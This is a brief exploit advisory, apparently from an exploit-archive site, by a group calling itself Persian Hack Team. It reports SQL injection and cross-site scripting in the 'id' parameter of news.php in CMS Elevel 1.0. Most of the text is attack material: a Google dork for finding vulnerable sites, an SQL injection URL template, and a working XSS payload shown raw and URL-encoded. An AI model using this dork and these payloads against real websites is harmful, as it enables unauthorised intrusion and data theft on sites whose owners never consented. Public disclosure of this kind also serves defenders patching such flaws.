Home / os / winmobile

CMS Elevel 1.0 Cross Site Scripting / SQL Injection

Posted on 21 June 2016

###################### # Exploit Title : CMS Elevel 1.0 - SQL Injection / XSS # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.elevel.it/privacy.php # Google Dork : "Web Design by Elevel" inurl:news.php # Category: [ Webapps ] # Tested on: [ Win ] # Version: 1.0 # Date: 2016/06/19 ###################### # # PoC: # id Parameter Vulnerable To SQL / XSS # 1-SQL Injection # Demo : # http://www.site.com/news.php?id=[SQL] # # 2- XSS # Payload = '><img onerror=alert(1) src="asd"> # http://www.site.com/news.php?id=2%27%3E%3Cimg%20onerror=alert%28%22XSS%22%29%20src=%22asd%22%3E # # Please Free Yaser Ebrahimi # ###################### # Discovered by : T3NZOG4N & Mojtaba MobhaM & FireKernel # Greetz : Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members # SP Tnx: Dr.askar zade # Homepage : persian-team.ir ######################

 

TOP